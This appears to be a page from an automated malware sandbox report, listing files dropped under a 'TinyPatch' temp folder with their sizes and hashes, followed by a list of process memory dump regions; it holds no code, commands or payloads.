Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\clrjit.dll

Filesize
1.2MB

MD5
8e636859f42c166c13eb041311299b8a

SHA1
d5b0d5104c5cfe1b7b2c95d7680c2e84d4f0d70b

SHA256
d713a5bafa2ef2fa7c1594d9c22d03357f62f8cb359208bf9e3616639dc351f9

SHA512
a5fbee9f04f5ef53c6ab2c666cb1f9e620ceacb25fc2eeb8a079887e2f3f3a3bbee88c6036d39125138f93c599986697444707db90e5ac30515e59d54246e094

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\coreclr.dll

Filesize
5.3MB

MD5
a2820e527c4b99c4c649df4e54d4f38d

SHA1
a2bca67626d532a3b1a96c5d913958470faa4727

SHA256
100a032cbeb299c8d7cfe02fb39ca59c8d17fbbe276ed1da577c0eb6444b1a51

SHA512
a0942fbe93394d0978cf5f9747fdff4db90faa88b264dc56ae79d50fc0fc17b2701a211a46fff86d579465273156fb278f49a89e5abd6c63fa7acccdd03a6627

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\hostfxr.dll

Filesize
396KB

MD5
307b6f5832c5b80c8bc87d97b67e4775

SHA1
9ab2916ae987ebf0131bab10e449933f3fadcfc0

SHA256
7652aeb0ecb06119b0871f6b850193d3ffae73e22bf207c81b67b155afa85991

SHA512
cec6e1b2c278b287fc05767a7c596b8f1d180d24ca5be0d4ed484ca8e82487bcc804245e6c60e45852ba7964a3b288f42504c792a617f5200b461089d7a9219b

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\hostpolicy.dll

Filesize
382KB

MD5
314f06e61af6221c9b4b0af77e1af522

SHA1
73b811d6488ab3dbb7edf9cf7d3daa0ce2343585

SHA256
ee653d530f0ba5bf0e7f691825dcbd2dc6995374820d7e4aef0604cc47c3b3ab

SHA512
b05785222438da0f1b0a30ed77d3977c8a96fda00cfe8475816cbcc9b05176253d8a150d713ca99f58145d36ecce7ab643cfc15def39e1169a122dcc2cbd863b

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\netstandard.dll

Filesize
112KB

MD5
47eda957551584d4338ee35f5fe6798f

SHA1
4b5220c3f6db4d29a2d98baa972ca3dc9d0a0762

SHA256
f3ea52f01fc8bdf8f9016f5f06d2903f30fc881fd00a025a7751b63e36d8c642

SHA512
cb50fb96c860793bc21c6a9c5017748dc91243e459347599550ed816e5b7c343d5d027294169c39e081e44e42c220b5ae03dba9333832ed93d914a1e58baea2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\wpfgfx_cor3.dll

Filesize
1.9MB

MD5
d99c93b53749d4364c7b16d5d99e3935

SHA1
cd9743223ba6c1199ea57d6dfbd764e2aff60033

SHA256
f8f7f596cd6151b47784ed96223d16f54b2b872768b03a0492ef19513c05771a

SHA512
ca29d5136c5d7b6b99009a9a356d62eff88acebf32707b8c1e540a7b946420aab5cc0f1148b7ebac891ff3afb321aca4bc122cfb20395ad3baf1cb68ee76a928

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mhabwqmb.sys.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/924-759-0x0000000006A00000-0x0000000006A4C000-memory.dmp

Filesize
304KB

Download
memory/924-765-0x0000000009750000-0x00000000097E6000-memory.dmp

Filesize
600KB

Download
memory/924-747-0x0000000006330000-0x0000000006396000-memory.dmp

Filesize
408KB

Download
memory/924-746-0x00000000062C0000-0x0000000006326000-memory.dmp

Filesize
408KB

Download
memory/924-745-0x00000000059C0000-0x00000000059E2000-memory.dmp

Filesize
136KB

Download
memory/924-762-0x0000000007FA0000-0x0000000007FAA000-memory.dmp

Filesize
40KB

Download
memory/924-869-0x000000000A2F0000-0x000000000A382000-memory.dmp

Filesize
584KB

Download
memory/924-769-0x00000000056F0000-0x0000000005702000-memory.dmp

Filesize
72KB

Download
memory/924-763-0x0000000009C80000-0x000000000A1AC000-memory.dmp

Filesize
5.2MB

Download
memory/924-767-0x000000000A760000-0x000000000AD04000-memory.dmp

Filesize
5.6MB

Download
memory/924-766-0x0000000008060000-0x0000000008082000-memory.dmp

Filesize
136KB

Download
memory/924-757-0x00000000063A0000-0x00000000066F4000-memory.dmp

Filesize
3.3MB

Download
memory/924-761-0x0000000007A70000-0x0000000007A8A000-memory.dmp

Filesize
104KB

Download
memory/924-760-0x00000000080D0000-0x000000000874A000-memory.dmp

Filesize
6.5MB

Download
memory/924-744-0x0000000005AB0000-0x00000000060D8000-memory.dmp

Filesize
6.2MB

Download
memory/924-758-0x0000000006940000-0x000000000695E000-memory.dmp

Filesize
120KB

Download
memory/924-764-0x0000000009920000-0x0000000009AE2000-memory.dmp

Filesize
1.8MB

Download
memory/924-743-0x00000000053A0000-0x00000000053D6000-memory.dmp

Filesize
216KB

Download
memory/3800-11-0x00007FFB93F40000-0x00007FFB94A01000-memory.dmp

Filesize
10.8MB

Download
memory/3800-0-0x00007FFB93F43000-0x00007FFB93F45000-memory.dmp

Filesize
8KB

Download
memory/3800-1-0x0000022E1C2E0000-0x0000022E1C302000-memory.dmp

Filesize
136KB

Download
memory/3800-14-0x00007FFB93F40000-0x00007FFB94A01000-memory.dmp

Filesize
10.8MB

Download
memory/3800-12-0x00007FFB93F40000-0x00007FFB94A01000-memory.dmp

Filesize
10.8MB

Download
memory/4136-663-0x00007FFB945E6000-0x00007FFB945E7000-memory.dmp

Filesize
4KB

Download
memory/4136-513-0x00007FFB945E6000-0x00007FFB945E7000-memory.dmp

Filesize
4KB

Download
memory/4324-677-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/4324-676-0x0000000001000000-0x0000000001243000-memory.dmp

Filesize
2.3MB

Download
memory/4324-674-0x0000000001000000-0x0000000001243000-memory.dmp

Filesize
2.3MB

Download
memory/4324-673-0x0000000001000000-0x0000000001243000-memory.dmp

Filesize
2.3MB

Download
memory/4360-742-0x0000000000400000-0x0000000000423000-memory.dmp

Filesize
140KB

Download
memory/4360-741-0x0000000000400000-0x0000000000423000-memory.dmp

Filesize
140KB

Download
memory/4368-661-0x000001F978560000-0x000001F9785D6000-memory.dmp

Filesize
472KB

Download
memory/4368-660-0x000001F978490000-0x000001F9784D4000-memory.dmp

Filesize
272KB

Download
memory/4832-670-0x0000000000710000-0x000000000076D000-memory.dmp

Filesize
372KB

Download
memory/4832-667-0x0000000000710000-0x000000000076D000-memory.dmp

Filesize
372KB

Download
memory/4832-666-0x0000000000710000-0x000000000076D000-memory.dmp

Filesize
372KB

Download